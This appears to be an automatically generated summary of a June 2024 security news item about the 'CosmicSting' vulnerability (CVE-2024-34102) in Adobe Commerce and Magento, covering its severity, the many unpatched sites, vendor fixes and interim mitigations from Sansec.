June 20, 2024 at 05:32PM
A critical vulnerability, “CosmicSting” (CVE-2024-34102), affecting Adobe Commerce and Magento websites, poses a major security threat. Despite a security update being available, the majority of impacted sites remain unpatched, leaving them open to severe attacks. Administrators are urged to apply the recommended fixes immediately, with specific versions provided. For those unable to upgrade, temporary measures are advised, but caution is urged due to potential risks.
Based on the meeting notes:
1. A critical vulnerability named “CosmicSting” (CVE-2024-34102) impacts Adobe Commerce and Magento websites, leaving millions of sites vulnerable to catastrophic attacks such as XML external entity injection (XXE) and remote code execution (RCE).
2. Approximately three out of four websites using impacted e-commerce platforms have not patched against CosmicSting, putting them at significant risk.
3. The vulnerability is rated critical (CVSS score: 9.8) and affects specific product versions of Adobe Commerce, Adobe Commerce Extended Support, Magento Open Source, and Adobe Commerce Webhooks Plugin.
4. The vendor has released fixes for CosmicSting with specific version numbers for various platforms and recommends immediate application of these fixes.
5. For those unable to upgrade immediately, Sansec recommends a ‘Report-Only’ mode before upgrading and provides an “emergency fix” code to block most CosmicSting attacks.
It is crucial to urgently communicate the severity of this vulnerability to the relevant stakeholders and ensure that the necessary patches or mitigations are applied to prevent potential attacks. Additionally, advising on the use of the emergency fix code and the “Report-Only” mode can help protect systems while planning for the full upgrade.